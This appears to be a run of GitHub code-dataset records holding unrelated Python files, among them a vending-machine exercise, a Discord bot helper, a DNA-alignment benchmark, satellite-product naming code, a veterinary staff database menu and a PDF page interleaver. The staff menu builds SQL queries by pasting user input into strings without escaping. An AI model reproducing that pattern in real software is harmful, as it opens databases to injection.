plt.subplots(1)\n\n ax.imshow(image)\n\n coords = decode_rect(coords, width, height)\n rect = patches.Rectangle(\n (coords[0], coords[1]), coords[2] - coords[0], coords[3] - coords[1], linewidth=1,\n edgecolor='r', facecolor='none')\n ax.add_patch(rect)\n\n\n if original != None:\n original = decode_rect(original, width, height)\n r = patches.Rectangle(\n (original[0], original[1]), original[2] - original[0], original[3] - original[1],\n linewidth=1, edgecolor='b', facecolor='none')\n ax.add_patch(r)\n\n plt.show()\n\n\ndef decode_rect(coords, width, height):\n result = np.copy(coords)\n for i in range(0, len(coords)):\n if i % 2 == 0:\n result[i] = int(width * coords[i])\n else:\n result[i] = int(height * coords[i])\n\n return result\n\n# image = read(PATH)\n# img = skimage.img_as_float(image)\n# im = np.array(img)\n# a = np.reshape(img, 480 * 640 * 3)\n# img = Image.open(PATH)\n# im = img.resize((96, 128))\n# i = np.array(im) / 255\n# print()\n# n_image = normalize(image)\n# show_image(n_image)\n\n# image = io.imread(PATH)\n# img = transform.resize(image, [480, 640], mode='reflect')\n# io.imsave(PATH, img)\n","repo_name":"oqewok/NeuralNetworks.TF","sub_path":"Net/image_proc.py","file_name":"image_proc.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21110687602","text":"def read_stock():\n \"\"\"\n txt파일을 읽어 coffee_list를 반환해준다.\n :return: coffee_list는 커피번호, 제품명, 가격, 제고로 이뤄진 2차원 배열이다.\n error는 오류가 있을 경우 오류메세지와 함께 반환되는 값이다.\n \"\"\"\n try:\n error = \"\"\n coffee_stock = open(\"coffee_stock.txt\", 'r', encoding=\"utf-8\")\n except FileNotFoundError as error:\n write_stock([])\n coffee_stock = open(\"coffee_stock.txt\", 'r', encoding=\"utf-8\")\n print(\"파일이 없습니다.\")\n coffee_list = []\n while True:\n line = coffee_stock.readline()\n if not line:\n break\n coffee_list.append(line.strip().split())\n coffee_stock.close()\n return coffee_list, error\n\n\ndef write_stock(coffee_list):\n \"\"\"\n 파일에 coffee_list를 쓴다.\n :param coffee_list를 받는다.\n \"\"\"\n # coffee_list가 비어있을 경우, 초기화를 사용한다.\n if not coffee_list:\n coffee_list = [[\"번호\", \"제품명\", \"가격\", \"재고\"]]\n coffee_stock = open(\"coffee_stock.txt\", 'w', encoding=\"utf-8\")\n for line_data in coffee_list:\n for data in line_data:\n coffee_stock.write(\"%s \" % data)\n coffee_stock.write(\"\\n\")\n coffee_stock.close()\n\n\ndef add_admin_goods_num(add_coffee):\n \"\"\"\n 물품의 개수를 변경한다.\n :param add_coffee: 변경한 커피의 번호\n \"\"\"\n goods_number = -1\n while goods_number < 0:\n goods_number = int(input(\"추가할 개수를 입력하세요: \"))\n coffee_list[add_coffee][len(coffee_list[0])-1] = str(int(coffee_list[add_coffee][len(coffee_list[0])-1]) + goods_number)\n\n\ndef add_admin_goods():\n \"\"\"\n 물품을 추가한다.\n \"\"\"\n goods_name = input(\"추가할 물품을 입력하세요.: \")\n goods_value = input(\"물품의 가격을 입력하세요.: \")\n goods_number = input(\"물품의 개수를 입력하세요.: \")\n coffee_list.append([str(len(coffee_list)), goods_name, goods_value, goods_number])\n\n\ndef del_admin_goods():\n pass\n\n\ndef admin_mode():\n coffee_num = 0\n while coffee_num != \"exit\":\n for i in range(1, len(coffee_list)):\n print(\"%s. %s: %s개\" % (coffee_list[i][0], coffee_list[i][1], coffee_list[i][3]))\n print(\"=\"*30)\n choice = int(input(\"1. 물품의 개수를 추가\\n2. 물품을 추가\\n3. 물품을 삭제\\n4. 종료\\n선택해주세요.: \"))\n while choice <= 0 or choice > 4:\n choice = int(input(\"1. 물품의 개수를 추가\\n2. 물품을 추가\\n3. 
물품을 삭제\\n4를 입력하면 종료됩니다.: \"))\n if choice == 1:\n while not(coffee_num in coffee_dict):\n for i in range(1, len(coffee_list)):\n print(\"%s. %s: %s개\" % (coffee_list[i][0], coffee_list[i][1], coffee_list[i][3]))\n coffee_num = int(input(\"추가할 커피를 선택하세요.(exit는 종료): \"))\n add_admin_goods_num(coffee_num)\n coffee_num = 0\n write_stock(coffee_list)\n elif choice == 2:\n for i in range(1, len(coffee_list)):\n print(\"%s. %s: %s개\" % (coffee_list[i][0], coffee_list[i][1], coffee_list[i][3]))\n add_admin_goods()\n write_stock(coffee_list)\n elif choice ==3:\n while not(coffee_num in coffee_dict):\n for i in range(1, len(coffee_list)):\n print(\"%s. %s: %s개\" % (coffee_list[i][0], coffee_list[i][1], coffee_list[i][3]))\n coffee_num = int(input(\"추가할 커피를 선택하세요.(exit는 종료): \"))\n add_admin_goods_num(coffee_num)\n coffee_num = 0\n del_admin_goods()\n write_stock(coffee_list)\n elif choice == 4:\n return\n\n\n# 프로그램의 시작, 초기화\ncoffee_list, file_error = read_stock()\n\n# 첫번째 행의 오류 무시\n# coffee_dict: key=coffee_num, value=coffee_name\n# coffee_value: key=coffee_name, value=coffee_value\ncoffee_dict = {}\ncoffee_value = {}\nfor line in coffee_list:\n try:\n coffee_dict[int(line[0])] = line[1]\n coffee_value[line[1]] = int(line[2])\n except:\n pass\n\nif file_error != \"\":\n print(\"재고가 초기화되어 admin에 접속합니다.\")\n admin_mode()\n\nwhile True:\n money = input(\"돈을 넣으세요: \")\n if money == \"admin\":\n admin_mode()\n else:\n money = int(money)\n break\n\n# 100원 이하는 무조건 거스름 돈으로 돌려주면서 끝낸다.\nwhile money > 100:\n # 가격 및 고를 수 있는 커피 출력\n for i in range(1, len(coffee_dict)+1):\n print(\"%d. %s\" % (i, coffee_dict[i]), end=\" \")\n if i != len(coffee_dict):\n print(\"(%d원), \" % coffee_value[coffee_dict[i]], end=\"\")\n else:\n print(\"\")\n\n # 커피를 선택\n user_choice = 0\n while user_choice <= 0 or user_choice > len(coffee_dict):\n user_choice = int(input(\"마실 커피를 골라주세요: \"))\n if user_choice == len(coffee_dict):\n break\n money -= coffee_value[coffee_dict[user_choice]]\n print(\"%d원이 남았습니다.\" % money)\nprint(\"거스름돈 %d원을 돌려주었습니다.\" % money)\n","repo_name":"imn00133/PythonSeminar17","sub_path":"exercise/vending_machine/vending_machine.py","file_name":"vending_machine.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72631542170","text":"import mysql.connector as connector\nfrom util.auth import MY_SQL\n\nclass BancoDados:\n def __init__(self, usuario, senha, host, banco_dados):\n self.__usuario = usuario\n self.__senha = senha\n self.__host = host\n self.__banco_dados = banco_dados\n self.__cnx = None # Conexão\n \n def iniciar_conexao(self):\n try:\n self.__cnx = connector.connect(\n user = self.__usuario,\n password = self.__senha,\n host = self.__host,\n database = self.__banco_dados,\n auth_plugin = \"mysql_native_password\"\n\n )\n except:\n self.__cnx.close()\n\n def encerrar_conexao(self):\n self.__cnx.close()\n \n def query_get(self, query_base):\n resposta = None\n \n try:\n cursor = self.__cnx.cursor()\n\n cursor.execute(query_base)\n resposta = cursor.fetchall()\n except:\n resposta = None\n finally:\n cursor.close()\n \n return resposta\n \n def query_post(self, query_base):\n try:\n cursor = self.__cnx.cursor()\n \n cursor.execute(query_base)\n self.__cnx.commit()\n\n id_ultima_linha = cursor.lastrowid\n linhas_afetadas = cursor.rowcount\n except:\n linhas_afetadas = None\n finally:\n cursor.close()\n \n return True if linhas_afetadas or linhas_afetadas else False\n \n @staticmethod\n def 
informa_caminho_haloc():\n        return BancoDados(\n            \"root\",\n            MY_SQL,\n            \"localhost\",\n            \"haloc\"\n        )","repo_name":"JoaoVictorSou/haloc-cadastros-py","sub_path":"models/banco_dados.py","file_name":"banco_dados.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"40238379143","text":"import logging\n\nfrom aiohttp import web\nfrom matplotlib import pyplot as plt\n\nfrom api.endpoints.routes import add_routes\nfrom utils import init_startup\n\n\nasync def init_app() -> web.Application:\n    app = web.Application()\n    logging.basicConfig(level=logging.INFO)\n\n    add_routes(app)\n    init_startup(app)\n\n    return app\n\n\ndef main():\n    plt.style.use(\"discord.mplstyle\")\n    web.run_app(\n        init_app(),\n        access_log_format='%a %t \"%r\" %s %b %Tf \"%{Referer}i\" \"%{User-Agent}i\"',\n    )\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"angaz/discord-covid-19","sub_path":"api_main.py","file_name":"api_main.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"17963898610","text":"# core file to handle circular imports\n\nimport json\nimport os\nfrom itertools import cycle\nfrom typing import *\n\nimport diskord\nfrom diskord.ext import tasks\nfrom diskord.utils import oauth_url\nfrom pydantic import BaseModel\n\nimport Bot\nfrom data import Database\nfrom utils.helpers import Context\n\n\ndef version():\n    with open(\"./VERSION.txt\", \"r+\") as f:\n        lines = f.read()\n    return lines or \"3.4.1\"\n\n\ndef oauth(ctx: Context):\n    url = oauth_url(\n        client_id=ctx.me.id,\n        permissions=diskord.Permissions.all(),\n        guild=ctx.guild,\n        redirect_uri=\"https://discord.gg/5nzgEWSnEG\", # Join btw\n    )\n    return url\n\n\n@tasks.loop(seconds=30)\nasync def change_status(bot):\n    \"\"\"Rotate the bot's presence through a cycle of status messages.\"\"\"\n    # Build the cycle once and cache it on the loop object: re-creating it on\n    # every iteration would make next(status) always return the first item.\n    if not hasattr(change_status, \"statuses\"):\n        change_status.statuses = cycle(\n            [\n                \"Banning Rule Breakers\",\n                \"Follow the rules\",\n                \"Get Gud lol\",\n                \"Sub to DCR\",\n                \"Give Marcus Boost Nitro\",\n                f\"DM {bot.config.ME} for a custom bot\",\n                \"It took Marcus 10 Days to Make me\",\n                \"Fun Fact: Marcus was born on June 10th\",\n                \"Helping people\",\n            ]\n        )\n    await bot.wait_until_ready()\n    await bot.change_presence(\n        activity=diskord.Activity(\n            type=diskord.ActivityType.watching, name=f\"{next(change_status.statuses)} | h!help\"\n        )\n    )\n","repo_name":"MarzaElise/Hutch-Bot","sub_path":"BaseFile.py","file_name":"BaseFile.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"}
+{"seq_id":"71935967451","text":"import string\n\nfnand = input('Enter file: ')\ntry:\n    lines = open(fnand)\nexcept:\n    print('File cannot be opened')\n    exit()\n\ncounts = dict()\ntotals = 0\naverage = 0\n\nfor line in lines:\n    #line = line.translate(line.maketrans('', '', string.punctuation + string.digits))\n    line = line.rstrip()\n    #line = line.lower()\n    line = line.split()\n    for word in line:\n        for letter in word:\n            totals += 1\n            if letter not in counts:\n                counts[letter] = 1\n            else:\n                counts[letter] += 1\n\nletters = list()\n\nfor key, val in list(counts.items()):\n    letters.append((key, val))\n\nletters.sort()\nfor key, val in letters:\n    average = round(val / totals * 100, 2)\n    print(key, 'shows up', average, 'percent or', val, 'times in', fnand)\nprint('Iterated through', totals, 'letters.')\n
","repo_name":"cabbott008/python","sub_path":"ex10.3.py","file_name":"ex10.3.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"6633535308","text":"list1=['piyush','abc','df']\r\nlist2=[]\r\ndict1={}\r\nfor word in list1:\r\n    list2.append(len(word))\r\n    dict1[word]=len(word)\r\nprint(max(list2))\r\n# Print each word whose length equals the longest length\r\nfor word,length in dict1.items():\r\n    if(length==max(list2)):\r\n        print(word,length)","repo_name":"PiyushWaghmare/Python-Cpp-Practicals","sub_path":"longest.py","file_name":"longest.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"17420238849","text":"import subprocess\nfrom timeit import default_timer as timer\nfrom random import choice\n\ncmds = {\n        \"orig\": [\"python2\", \"nw_align_original.py\"],\n        \"orig3\": [\"python\", \"nw_align_original.py\"],\n        \"numpy\": [\"python\", \"nw_align.py\", \"numpy\"],\n        \"numba\": [\"python\", \"nw_align.py\", \"numba\"],\n        \"torch\": [\"python\", \"nw_align.py\", \"torch\"],\n        \"torchcuda\": [\"python\", \"nw_align.py\", \"torchcuda\"],\n        \"cupy\": [\"python\", \"nw_align.py\", \"cupy\"],\n        \"nimc\": [\"./nw_align\"],\n        \"nimjs\": [\"node\", \"nimcache/nw_align.js\"],\n        \"js\": [\"node\", \"nw_align.js\"]\n        }\n\nNs = [500,1000,1500,2000,2500,3000,5000]\nmaxlen = {\"cupy\":1000, \"torchcuda\":5000}\n\nout = {}\nout[\"out\"] = {k:{} for k in cmds}\nout[\"time\"] = {k:{} for k in cmds}\n\nfor N in Ns:\n    seq1 = ''.join(choice(\"ACGT\") for _ in range(N))\n    seq2 = ''.join(choice(\"ACGT\") for _ in range(N))\n\n    for k, cmd in cmds.items():\n        if k in maxlen and N > maxlen[k]: continue\n\n        start = timer()\n        out[\"out\"][k][N] = subprocess.check_output(cmd + [seq1, seq2]).decode()\n        end = timer()\n        out[\"time\"][k][N] = end - start\n\nfor N in Ns:\n    # Only compare methods that actually ran for this N (some are skipped by maxlen)\n    outs = {k: out[\"out\"][k][N] for k in cmds if N in out[\"out\"][k]}\n    assert len(set(outs.values())) == 1, \"not the same output from every method {}\".format(set(outs.values()))\n    # DEBUG print(outs)\n\nprint(out[\"time\"])\n","repo_name":"hgbrian/nw_align","sub_path":"test_nw_align.py","file_name":"test_nw_align.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"31392416268","text":"# This Python file uses the following encoding: utf-8\n\n# if__name__ == \"__main__\":\n#     pass\n\nimport sys\nfrom PySide2.QtWidgets import QApplication, QPushButton\nfrom PySide2.QtCore import Slot\n'''\nNOTE: The @Slot() is a decorator that identifies a function as a slot.\nAlways use it to avoid unexpected behavior\n\n'''\n\n# Greetings\n@Slot()\ndef say_hello():\n    print(\"Button clicked, Hello!\")\n\n\n# Create the Qt application\napp = QApplication(sys.argv)\n\n# Create a Button\nbutton = QPushButton(\"Click me\")\n# Connect the button to the function\nbutton.clicked.connect(say_hello)\n# Show the button\nbutton.show()\n\n# Run the main Qt loop\napp.exec_()\n","repo_name":"edalvaren/qt4python_training","sub_path":"signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"6847600217","text":"import os\nimport logging\n\nfrom ewoc_dag.eo_prd_id.s1_prd_id import S1PrdIdInfo\n\nlogger = logging.getLogger(__name__)\n\ndef l2a_to_ard(product_id, work_dir):\n    \"\"\"\n    Convert an L2A product into EWoC ARD format\n
    :param product_id: L2A product identifier\n    :param work_dir: Output directory\n    \"\"\"\n    bands = {\n        \"B02\": 10,\n        \"B03\": 10,\n        \"B04\": 10,\n        \"B08\": 10,\n        \"B05\": 20,\n        \"B06\": 20,\n        \"B07\": 20,\n        \"B11\": 20,\n        \"B12\": 20,\n        \"SCL\": 20,\n    }\n    # Prepare ewoc folder name\n    platform = product_id.split(\"_\")[0]\n    processing_level = product_id.split(\"_\")[1]\n    date = product_id.split(\"_\")[2]\n    year = date[:4]\n    # Get tile id, remove the leading T\n    tile_id = product_id.split(\"_\")[5][1:]\n    atcor_algo = \"L2A\"\n    unique_id = \"\".join(product_id.split(\"_\")[3:6])\n    folder_st = os.path.join(\n        work_dir,\n        \"OPTICAL\",\n        tile_id[:2],\n        tile_id[2],\n        tile_id[3:],\n        year,\n        date.split(\"T\")[0],\n    )\n    dir_name = f\"{platform}_{processing_level}_{date}_{unique_id}_{tile_id}\"\n\n    # Build the ARD raster file name for each band and for SCL\n    raster_fn_list = []\n    for band in bands:\n        out_name = f\"{platform}_{atcor_algo}_{date}_{unique_id}_{tile_id}_{band}.tif\"\n        raster_fn = os.path.join(folder_st, dir_name, out_name)\n        raster_fn_list.append(raster_fn)\n\n    return raster_fn_list\n\n\ndef l8_to_ard(key, s2_tile, out_dir=None):\n    product_id = os.path.split(key)[-1]\n    platform = product_id.split('_')[0]\n    processing_level = product_id.split('_')[1]\n    date = product_id.split('_')[3]\n    year = date[:4]\n    # Get tile id, remove the leading T\n    tile_id = s2_tile\n    unique_id = f\"{product_id.split('_')[2]}{product_id.split('_')[5]}{product_id.split('_')[6]}\"\n    folder_st = os.path.join('TIR', tile_id[:2], tile_id[2], tile_id[3:], year, date.split('T')[0])\n    dir_name = f\"{platform}_{processing_level}_{date}_{unique_id}_{tile_id}\"\n    out_name = f\"{platform}_{processing_level}_{date}_{unique_id}_{tile_id}\"\n    raster_fn = os.path.join(folder_st, dir_name, out_name)\n    if out_dir is not None:\n        tmp = os.path.join(out_dir, folder_st, dir_name)\n        if not os.path.exists(tmp):\n            os.makedirs(tmp)\n    return raster_fn\n\n\ndef to_ewoc_s1_ard(out_dirpath,\n                   s1_prd_info,\n                   s2_tile_id):\n    s1_prd_info = S1PrdIdInfo(s1_prd_info) # Transformation to a S1 EO product\n    orbit_direction = 'DES' # TODO retrieve from GDAL MTD of the output s1_process file or from mtd of the input product\n    relative_orbit = 'TODO' # TODO retrieve from GDAL MTD of the output s1_process file or from mtd of the input product\n\n    ewoc_output_dirname_elt = [s1_prd_info.mission_id,\n                               s1_prd_info.start_time.strftime(s1_prd_info.FORMAT_DATETIME),\n                               orbit_direction,\n                               relative_orbit,\n                               s1_prd_info.absolute_orbit_number + s1_prd_info.mission_datatake_id + s1_prd_info.product_unique_id,\n                               s2_tile_id]\n    ewoc_output_dirname = '_'.join(ewoc_output_dirname_elt)\n    ewoc_output_dirpath = out_dirpath / 'SAR' / s2_tile_id[:2] / s2_tile_id[2] / s2_tile_id[3:] / \\\n                          str(s1_prd_info.start_time.year) / s1_prd_info.start_time.date().strftime(\n        '%Y%m%d') / ewoc_output_dirname\n    logger.debug('Create output directory: %s', ewoc_output_dirpath)\n    ewoc_output_dirpath.mkdir(exist_ok=True, parents=True)\n\n    calibration_type = 'SIGMA0' # TODO retrieve from GDAL MTD of the output s1_process file or from parameters\n    output_file_ext = '.tif'\n    ewoc_output_filename_elt = ewoc_output_dirname_elt + [calibration_type]\n    ewoc_output_filename_vv = '_'.join(ewoc_output_filename_elt + ['VV']) + output_file_ext\n    ewoc_output_filepath_vv = ewoc_output_dirpath / ewoc_output_filename_vv\n    logger.debug('Output VV filepath: %s', ewoc_output_filepath_vv)\n    ewoc_output_filename_vh = '_'.join(ewoc_output_filename_elt + ['VH']) + output_file_ext\n    ewoc_output_filepath_vh = ewoc_output_dirpath / 
ewoc_output_filename_vh\n logger.debug('Output VH filepath: %s', ewoc_output_filepath_vh)\n\n return ewoc_output_filepath_vv, ewoc_output_filepath_vh\n","repo_name":"WorldCereal/ewoc_dataship","sub_path":"src/ewoc_dag/legacy/pid_to_ard.py","file_name":"pid_to_ard.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26413124140","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # 6. 텍스트\n\n# In[1]:\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.rcParams['font.family'] = 'Malgun Gothic'\n# matplotlib.rcParams['font.family'] = 'Apple Gothic' # Mac용 \nmatplotlib.rcParams['font.size'] = 15 # 글자크기\nmatplotlib.rcParams['axes.unicode_minus'] = False\n\n\n# In[2]:\n\n\nx = [1,2,3]\ny = [2,4,8]\n\n\n# In[3]:\n\n\nplt.plot(x,y)\n\n\n# In[12]:\n\n\nplt.plot(x,y, marker ='o')\n\nt = ['1', '2', '3']\n\nfor idx, txt in enumerate(t):\n plt.text(x[idx],y[idx] + 0.2, txt, ha='center', color = 'b') #x좌표와 y좌표에 txt 넣어주고 # x좌표(수평정렬) 가운데정렬\n \n # enumerate() : 인덱스와 값에 접근 \n # enumerate(t) : t데이터의 값을 찍어준다.\n # 마커와 겹치지 않게 +0.2\n # ha: horizental align \n # plt.text : 그래프 마커에 text넣어준다\n\n","repo_name":"Choi-09/Python","sub_path":"K-digital/Chapter4.분석패키지/Matplotlib/06.텍스트.py","file_name":"06.텍스트.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35262920252","text":"#!/usr/local/bin/python3\nimport psycopg2\nimport os\nimport datetime\nimport json \n\ndef personnel_menu(conn):\n choice = 0\n continu = True\n while(continu):\n os.system(\"clear\")\n print(\"\\n\\t\\tGestion du personnel\")\n print(\"\\n\\t### Que voulez-vous faire ? ###\")\n print(\"\\t0\\tRevenir au menu principal\\n\")\n print(\"\\t1\\tVoir les membres du personnel\")\n print(\"\\t2\\tAjouter un membre du personnel\")\n print(\"\\t3\\tModifier un membre du personnel\")\n print(\"\\t4\\tRechercher un personnel par son nom ou prénom\")\n print(\"\\t5\\tVoir le détail de la fiche d'un membre du personnel\")\n choice = int(input(\"\\n> \"))\n os.system(\"clear\")\n\n if(choice == 0):\n continu = False\n print(\"\\n\\tRetour au menu\")\n elif(choice == 1):\n voir_membres_personnel(conn)\n elif(choice==2):\n ajouter_membre_personnel(conn)\n elif(choice==3):\n modifier_membre_personnel(conn)\n elif(choice==4):\n rechercher_membre_personnel(conn)\n elif(choice==5):\n detail_membre_personnel(conn)\n\n\ndef voir_membres_personnel(conn):\n cur = conn.cursor()\n sql = \"SELECT * FROM PERSONNEL ORDER BY ID ASC;\"\n cur.execute(sql)\n res = cur.fetchall()\n print(\"\\tVoici les membres du personnel :\")\n print(\"\\t#ID\")\n for raw in res:\n print(\"\\t#%s\\tPOSTE : %s\\t%s %s\" % (raw[0], raw[6], raw[1], raw[2]))\n input()\n cur.close()\n\ndef ajouter_membre_personnel(conn): \n cur = conn.cursor()\n print(\"\\tInsertion d'un nouveau membre du personnel :\")\n nom = quote(input(\"\\tIndiquez le nom\\n\\t> \"))\n prenom = quote(input(\"\\tIndiquez le prénom\\n\\t> \"))\n adresse = quote(input(\"\\tIndiquez l'adresse\\n\\t> \"))\n numero_tel = quote(input(\"\\tIndiquez le numéro de téléphone\\n\\t> \")) \n annee_bd = int(input(\"\\tIndiquez l'annee de naissance\\n\\t> \"))\n mois_bd = int(input(\"\\tIndiquez le mois de naissance\\n\\t> \"))\n jour_bd= int(input(\"\\tIndiquez le jour de naissance\\n\\t> \"))\n date_de_naissance= quote(datetime.date(annee_bd, mois_bd, jour_bd))\n poste = quote(input(\"\\tIndiquez le poste (Veto, 
Assistant)\\n\\t> \"))\n specialites = []\n specialite = \"aa\"\n while specialite != \"\":\n print(\"\\tSpecialites possibles :\")\n sql = \"SELECT * FROM ESPECE ORDER BY ESPECE ASC\"\n cur.execute(sql)\n results = cur.fetchall()\n for result in results:\n print(\"\\t- %s\" % (result[0]))\n specialite = str(input(\"\\n\\tIndiquez une spécialité à ajouter ('entrée' quand fini)\\n\\t> \"))\n if(specialite!=\"\"):\n sql = \"SELECT * FROM ESPECE WHERE ESPECE=%s;\" % (quote(specialite))\n cur.execute(sql)\n if(cur.fetchall()):\n specialites.append(specialite)\n print(\"\\tLa spécialité a été ajoutée\")\n else:\n print(\"\\t! La spécialité indiquée n'existe pas\")\n try: \n sql = \"INSERT INTO PERSONNEL (Nom, Prenom, DateDeNaissance, Adresse, NumeroTel, Poste, Specialites) VALUES (%s, %s, %s, %s, %s, %s, '{\\\"specialites\\\" : %s}');\" % (nom, prenom, date_de_naissance, adresse, numero_tel, poste, json.dumps(specialites))\n cur.execute(sql)\n conn.commit()\n print(\"\\tCommande exécutée\")\n except psycopg2.IntegrityError as e: \n conn.rollback()\n print(e)\n cur.close()\n\ndef modifier_membre_personnel(conn):\n print(\"\\tVeuillez indiquer l'ID du personnel à modifier :\")\n id = int(input(\"\\n> \"))\n print(\"\\n\\tVeuillez indiquer l'information que vous voulez modifier :\")\n print(\"\\tnom\")\n print(\"\\tprenom\")\n print(\"\\tadresse\")\n print(\"\\tnumeroTel\")\n print(\"\\tposte\")\n print(\"\\tspecialites\")\n column = str(input(\"\\n> \"))\n cur = conn.cursor()\n if(column==\"specialites\"):\n specialites = []\n specialite = \"aa\"\n while specialite != \"\":\n print(\"\\tSpecialites possibles :\")\n sql = \"SELECT * FROM ESPECE ORDER BY ESPECE ASC\"\n cur.execute(sql)\n results = cur.fetchall()\n for result in results:\n print(\"\\t- %s\" % (result[0]))\n specialite = str(input(\"\\n\\tIndiquez une spécialité à ajouter ('entrée' quand fini)\\n\\t> \"))\n if(specialite!=\"\"):\n sql = \"SELECT * FROM ESPECE WHERE ESPECE=%s;\" % (quote(specialite))\n cur.execute(sql)\n if(cur.fetchall()):\n specialites.append(specialite)\n print(\"\\tLa spécialité a été ajoutée\")\n else:\n print(\"\\t! 
La spécialité indiquée n'existe pas\")\n value = quote(\"{\\\"specialites\\\" : %s}\" % (json.dumps(specialites)))\n else:\n print(\"\\n\\tVeuillez indiquer la nouvelle valeur :\")\n value = quote(input(\"\\n> \"))\n try:\n sql = \"UPDATE PERSONNEL SET %s = %s WHERE ID=%i;\" % (column,value,id)\n cur.execute(sql)\n print(\"\\tCommande exécutée\")\n conn.commit()\n cur.close()\n except psycopg2.Error:\n conn.rollback()\n print(\"Erreur lors de la mise à jour, merci de réessayer.\")\n\ndef rechercher_membre_personnel(conn):\n print(\"\\tVeuillez indiquer le nom ou prénom du personnel :\")\n string = quote(input(\"\\n> \"))\n cur = conn.cursor()\n sql = \"SELECT * FROM PERSONNEL WHERE strpos(nom,%s)>0 OR strpos(prenom,%s)>0 ORDER BY ID ASC;\" % (string,string)\n cur.execute(sql)\n res = cur.fetchall()\n print(\"\\tVoici les membres du personnel trouvés pour votre requête :\")\n print(\"\\t#ID\")\n for raw in res:\n print(\"\\t#%s\\tPOSTE : %s\\t%s %s\" % (raw[0], raw[6], raw[1], raw[2]))\n input()\n cur.close()\n\ndef detail_membre_personnel(conn):\n print(\"\\tVeuillez indiquer l'ID du membre du personnel :\")\n ID = int(input(\"\\n> \"))\n cur = conn.cursor()\n sql = \"SELECT * FROM PERSONNEL WHERE id=%i;\" % (ID)\n cur.execute(sql)\n res = cur.fetchall()\n print(\"\\t#ID : %i\" % (ID))\n for raw in res:\n print(\"\\t%s %s (né le %s)\" % (raw[2],raw[1],raw[3]))\n print(\"\\tPoste : %s\" % (raw[6]))\n print(\"\\tTelephone : %s\" % raw[5])\n print(\"\\tAdresse : %s\" % raw[4])\n try:\n print(\"\\tSpecialités :\")\n for specialite in raw[7][\"specialites\"]:\n print(\"\\t - %s\" % (specialite))\n except:\n pass\n\n sql = \"SELECT * FROM SOIGNANT_ACTUEL WHERE ID_Personnel=%i\" % (ID)\n cur.execute(sql)\n res = cur.fetchall()\n print(\"\\n\\tPatients actuels\")\n for raw in res:\n print(\"\\t - #%s\\t%s (depuis le %s)\" % (raw[1],raw[0],raw[5]))\n \n sql = \"SELECT * FROM SOIGNANT_PASSE WHERE ID_Personnel=%i\" % (ID)\n cur.execute(sql)\n res = cur.fetchall()\n print(\"\\n\\tAnciens patients\")\n for raw in res:\n print(\"\\t - #%s\\t%s (du %s au %s)\" % (raw[1],raw[0],raw[5],raw[6]))\n print('\\n')\n input()\n cur.close()\n\ndef quote(s):\n if s:\n return '\\'%s\\'' % s\n else:\n return 'NULL'\n","repo_name":"StephaneBranly/NF18-Database","sub_path":"personnel.py","file_name":"personnel.py","file_ext":"py","file_size_in_byte":7035,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"15603999361","text":"\"\"\"\"------------------------------------------------------------------\nPDF Interweaver\n(c) Jeff Kessler, 2019-06-15-1710\n\n2023-08-13-0855-JK Fix for unequal page numbers\n Distinct filenames\n------------------------------------------------------------------\"\"\"\n\nimport PyPDF2\nimport time\n\n#input(\"Filepath 1: \")\n\ndef pdf_merger(original_fp, new_fp, watermark, mark1, mark2):\n\n # Open PDF Files\n a = PyPDF2.PdfFileReader(original_fp)\n b = PyPDF2.PdfFileReader(new_fp)\n\n\n # Open Watermark files\n if watermark:\n watermark_pdf = PyPDF2.PdfFileReader(watermark)\n watermark = watermark_pdf.getPage(0)\n\n if mark1:\n mark1_pdf = PyPDF2.PdfFileReader(mark1)\n mark1 = mark1_pdf.getPage(0)\n\n if mark2:\n mark2_pdf = PyPDF2.PdfFileReader(mark2)\n mark2 = mark2_pdf.getPage(0)\n\n\n # Determine common page count\n common_page_count = min(a.numPages, b.numPages)\n\n\n # Establish merged PDF\n merged = PyPDF2.PdfFileWriter()\n\n\n # Iteratively add common pages\n for pagenum in range(common_page_count):\n pagea = 
a.getPage(pagenum)\n        pageb = b.getPage(pagenum)\n        if mark1:\n            pagea.mergePage(mark1)\n        if mark2:\n            pageb.mergePage(mark2)\n        if watermark:\n            pagea.mergePage(watermark)\n            pageb.mergePage(watermark)\n        merged.addPage(pagea)\n        merged.addPage(pageb)\n\n    # Add Unique Pages\n    # Only the current document's page exists here; the other document has run\n    # out of pages, so a blank page is added in its place.\n    for pagenum in range(common_page_count, a.numPages):\n        pagea = a.getPage(pagenum)\n        if mark1:\n            pagea.mergePage(mark1)\n        if watermark:\n            pagea.mergePage(watermark)\n        merged.addPage(pagea)\n        merged.addBlankPage()\n\n    for pagenum in range(common_page_count, b.numPages):\n        pageb = b.getPage(pagenum)\n        if mark2:\n            pageb.mergePage(mark2)\n        if watermark:\n            pageb.mergePage(watermark)\n        merged.addBlankPage()\n        merged.addPage(pageb)\n\n\n    # Save Merged PDF\n    with 